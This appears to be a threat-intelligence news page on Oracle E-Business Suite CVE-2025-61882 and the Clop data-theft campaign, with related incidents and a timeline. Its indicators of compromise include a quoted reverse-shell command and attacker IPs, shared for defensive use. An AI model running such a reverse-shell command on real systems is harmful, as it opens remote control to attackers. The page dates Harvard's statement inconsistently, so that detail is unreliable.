Find notable cyber news and cases, enriched with sources, timelines, and signals.

Oracle E-Business Suite actively exploited unauthenticated RCE (CVE-2025-61882)

Vulnerability
First reported
Last updated
Happening score
H score 86
2 unique sources, 9 articles

Summary

Hide ▲

Oracle disclosed and patched CVE-2025-61882, a critical Oracle E-Business Suite zero-day in Concurrent Processing / BI Publisher Integration that enabled unauthenticated remote code execution and was tied to Clop data theft activity. Oracle said the flaw affected 12.2.3-12.2.14, issued an emergency update, and published indicators of compromise after the abuse was linked to August 2025. On Dec. 23, 2025, Harvard University said Clop had added it to its leak site and threatened to release data. Harvard said the activity appeared limited to a small administrative unit and that it had applied Oracle's patch with no evidence of compromise to other university systems.

Cases

Related Happenings

Oracle WebLogic Server CVE-2026-21962 rapid exploitation wave

Exploitation Wave
H score59 First: 26.03.2026 18:00 Last: 26.03.2026 18:00 Sources 1

About this happening: Oracle WebLogic Server systems faced a rapid CVE-2026-21962 exploitation wave after public exploit code appeared, creating immediate RCE risk for exposed servers. The...

Madison Square Garden hit by network compromise linked to Cl0p

Incident
H score38 First: 02.03.2026 15:53 Last: 02.03.2026 15:53 Sources 1

About this happening: Madison Square Garden confirmed a data breach that exposed names and SSNs, and it has started notifying affected people. The compromise involved a hosted Oracle E-Bu...

Cl0p Oracle E-Business Suite zero-day extortion campaign

Campaign
H score37 First: 02.03.2026 15:53 Last: 02.03.2026 15:53 Sources 1

About this happening: The Cl0p ransomware and extortion group is running an Oracle E-Business Suite extortion campaign that used zero-day vulnerabilities to access data from more than 100...

SolarWinds Web Help Desk (WHD) multi-stage exploitation wave

Exploitation Wave
H score44 First: 09.02.2026 16:42 Last: 09.02.2026 16:42 Sources 1

About this happening: SolarWinds Web Help Desk (WHD) exploitation is a multi-stage intrusion wave affecting internet-exposed WHD instances. The foothold remains unconfirmed, but the wave is...

Latest development: 10.03.2026 08:17

CISA added CVE-2025-26399 in SolarWinds Web Help Desk to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation, said Microsoft and Huntress had reported threat actors using SolarWinds Web Help Desk flaws to obtain initial access, attributed the activity to the Warlock ransomware crew, and ordered Federal Civilian Executive Branch (FCEB) agencies to apply the fix by March 12, 2026.

CISA KEV remediation deadline for SolarWinds WHD CVE-2025-40551

Public Sector Action
H score53 First: 04.02.2026 07:50 Last: 04.02.2026 07:50 Sources 1

About this happening: CISA added CVE-2025-40551 in SolarWinds Web Help Desk to the KEV catalog and imposed federal remediation deadlines, turning a newly exploited flaw into a compl...

Timeline

  1. 13.10.2025 14:14 5 articles · 9mo ago

    Harvard University linked to Oracle E-Business Suite zero-day breach

    Victim Impact Update

    Harvard University is investigating a data breach tied to Oracle E-Business Suite CVE-2025-61882 after Clop added Harvard to its data leak site and said it would release the university’s data; Harvard said the affected activity appears limited to a small administrative unit, that it applied Oracle’s patch to remediate the vulnerability, and that it has no evidence of compromise to other University systems.

    Show sources
  2. 06.10.2025 04:37 5 articles · 9mo ago

    Oracle discloses and patches CVE-2025-61882 in Oracle E-Business Suite

    Initial Disclosure

    Oracle warned that CVE-2025-61882 is a critical Oracle E-Business Suite zero-day in Oracle Concurrent Processing (BI Publisher Integration) with a CVSS base score of 9.8, remotely exploitable without authentication and capable of remote code execution, affecting versions 12.2.3-12.2.14. Oracle released an emergency update and said customers may need to install the October 2023 Critical Patch Update first; the same vulnerability was tied to Clop data theft activity in August 2025, and Oracle published indicators of compromise including `200[.]107[.]207[.]26`, `185[.]181[.]60[.]11`, and `sh -c /bin/bash -i >& /dev/tcp// 0>&1` that matched the exploit archive shared on Telegram.

    Show sources